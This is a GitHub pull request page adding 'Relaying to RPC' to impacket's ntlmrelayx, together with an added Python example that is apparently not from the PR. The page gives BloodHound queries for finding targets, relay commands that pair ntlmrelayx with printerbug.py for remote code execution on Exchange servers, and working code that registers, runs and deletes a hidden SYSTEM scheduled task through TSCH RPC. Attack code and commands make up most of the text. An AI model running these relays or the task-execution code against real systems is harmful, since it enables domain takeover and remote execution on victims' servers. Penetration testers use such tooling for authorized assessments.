Added Relaying to RPC support #857
Merged: 1 commit into SecureAuthCorp:master from mohemiv:master on May 20, 2020

Conversation

@mohemiv (Contributor) commented May 15, 2020

Hello there,

This PR implements the Relaying to RPC attack, which currently allows RCE on any MS Exchange server via the Exchange Trusted Subsystem group (all Exchange systems have Administrator rights to each other via this or a similar group) and printerbug.py.

BloodHound queries to find vulnerable machines

MATCH p=(a:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(b:Computer) RETURN p
MATCH p=(a:Computer)-[r:AdminTo]->(b:Computer) RETURN p

Usage
Relaying to ncacn_ip_tcp:

# Console 1
sudo python2 ntlmrelayx.py -debug -c whoami -t rpc://EXCHANGE1-ADDR
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

Relaying to IPC$ (a low-privileged account is needed, but it requires only 445/tcp, and the connection will be encrypted):

# Console 1
sudo python2 ntlmrelayx.py -c whoami -t rpc://EXCHANGE1-ADDR -rpc-use-smb -auth-smb 'CONTOSO/test:P@ssw0rd'
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

Description
My original complete patch: https://gist.github.com/mohemiv/ab542e4ff5d8fedda790e35326705bad
MD5SUM from May 2, 2020: https://twitter.com/_mohemiv/status/1256636651780087809

The supported functions:

  1. Relaying to ncacn_ip_tcp ports to the TSCH service
  2. Relaying to SMB to IPC$ directly to the TSCH service

Also I've tested relaying connections to the MMC20 object, but relaying to DCOM will give you only the relayed user's permissions; in my PoC it required 2 connections from the target, and there is no way to launch a DCOM object via only 445/tcp. So, the full PoC for DCOM has not been developed. Relaying to WMI is not possible, as WMI requires signing.

As you already know, the Compass Security company has already published a description of this attack (https://twitter.com/compasssecurity/status/1260898906629529602), but as far as I know from MS, the patch is not fully developed yet. Maybe it is because of the IPC$ and MMC20 examples I sent via MSRC.

For @CompassSecurity, it will be interesting to see your RPC server and ways to get an incoming RPC connection 😎
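The Usage section above shows the relay end to end but not what is sent on the TSCH interface once the coerced authentication has been relayed. The following is an added example, not code from this PR or from impacket's own scripts: a credentialed client that issues the Task Scheduler calls (SchRpcRegisterTask, SchRpcRun, SchRpcGetLastRunInfo, SchRpcDelete) against the two endpoints the PR relays to, `ncacn_ip_tcp` located through the endpoint mapper, and the `\pipe\atsvc` named pipe over IPC$ (445/tcp). The target names, credentials, task XML layout and helper names (`named_pipe_binding`, `build_task_xml`, `run_as_system`) are assumptions made for illustration; the RPC calls themselves are impacket's existing `tsch`, `epm` and `transport` APIs.

```python
"""Added example, not code from PR #857 or from impacket's own scripts: drive the
Task Scheduler (TSCH) RPC interface the PR relays to, with explicit credentials
instead of a relayed session, so the calls a relay issues are visible in one
place.  Target names, credentials, the task layout and the helper names are
illustrative assumptions; the RPC calls are impacket's tsch/epm/transport API."""
import random
import string
import time
from xml.sax.saxutils import escape


def named_pipe_binding(target):
    """String binding for the TSCH named pipe reached through IPC$ on 445/tcp."""
    return r'ncacn_np:%s[\pipe\atsvc]' % target


def random_name(length=8):
    """Random task/output name so repeated runs do not collide."""
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))


def build_task_xml(command, output_name):
    """Task definition running `command` under cmd.exe as LocalSystem (S-1-5-18),
    output redirected to %windir%\\Temp\\output_name on the target.  The shell
    redirection is XML-escaped so '>' and '&' survive inside the XML body."""
    args = escape(f'/C {command} > %windir%\\Temp\\{output_name} 2>&1')
    return f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <AllowHardTerminate>true</AllowHardTerminate>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>{args}</Arguments>
    </Exec>
  </Actions>
</Task>"""


def run_as_system(target, command, domain, username, password, use_smb=False):
    """Register, run, wait for and delete a hidden SYSTEM task on `target`;
    returns the output file's path relative to the ADMIN$ share."""
    # Imported here so the XML/binding helpers stay usable without impacket.
    from impacket.dcerpc.v5 import epm, transport, tsch
    from impacket.dcerpc.v5.dtypes import NULL
    from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_CONNECT

    if use_smb:
        # SMB carries the authentication (the PR's -rpc-use-smb mode, 445/tcp only).
        binding = named_pipe_binding(target)
    else:
        # Ask the endpoint mapper (135/tcp) which high port serves TSCH over ncacn_ip_tcp.
        binding = epm.hept_map(target, tsch.MSRPC_UUID_TSCHS, protocol='ncacn_ip_tcp')
    rpctransport = transport.DCERPCTransportFactory(binding)
    rpctransport.set_credentials(username, password, domain)
    dce = rpctransport.get_dce_rpc()
    dce.set_credentials(*rpctransport.get_credentials())
    if not use_smb:
        # CONNECT level: NTLM in the bind, no packet signing or sealing.  A relayed
        # session never learns the NTLM session key, so this is the only level it
        # can satisfy; an interface demanding PKT_INTEGRITY (the PR cites WMI) is
        # out of reach for the relay.
        dce.set_auth_level(RPC_C_AUTHN_LEVEL_CONNECT)
    dce.connect()
    dce.bind(tsch.MSRPC_UUID_TSCHS)

    task_path = '\\' + random_name()
    output_name = random_name() + '.tmp'
    tsch.hSchRpcRegisterTask(dce, task_path, build_task_xml(command, output_name),
                             tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
    try:
        tsch.hSchRpcRun(dce, task_path)
        # Poll until the scheduler records a last-run time, then clean up.
        while tsch.hSchRpcGetLastRunInfo(dce, task_path)['pLastRuntime']['wYear'] == 0:
            time.sleep(2)
    finally:
        tsch.hSchRpcDelete(dce, task_path)
        dce.disconnect()
    return 'Temp\\' + output_name
```

Usage mirrors the two consoles above: `run_as_system('EXCHANGE1-ADDR', 'whoami', 'CONTOSO', 'test', 'P@ssw0rd', use_smb=True)` for the IPC$ path, or `use_smb=False` for the endpoint-mapper path; the returned name is the file to fetch afterwards from `ADMIN$`. In the relayed case ntlmrelayx supplies the authentication that `set_credentials` provides here, which is why the `ncacn_ip_tcp` branch pins the auth level to CONNECT: the relay can forward the NTLM exchange but cannot sign the packets that follow it.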

@mohemiv mohemiv force-pushed the mohemiv:master branch from 65c2b24 to b5b9ca8 May 15, 2020
@mohemiv mohemiv changed the title from "Added Reaying to RPC support" to "Added Relaying to RPC support" May 15, 2020
@mohemiv mohemiv force-pushed the mohemiv:master branch from 724d09f to b5b9ca8 May 18, 2020
@0xdeaddood (Contributor) commented May 20, 2020

Hey @mohemiv! Great addition! It works like a charm!

@asolino (Contributor) commented May 20, 2020

Thanks a lot for the addition @mohemiv and @0xdeaddood for testing it. Merging!

@asolino asolino merged commit 3f1e7dd into SecureAuthCorp:master May 20, 2020
1 check passed: Travis CI - Pull Request Build Passed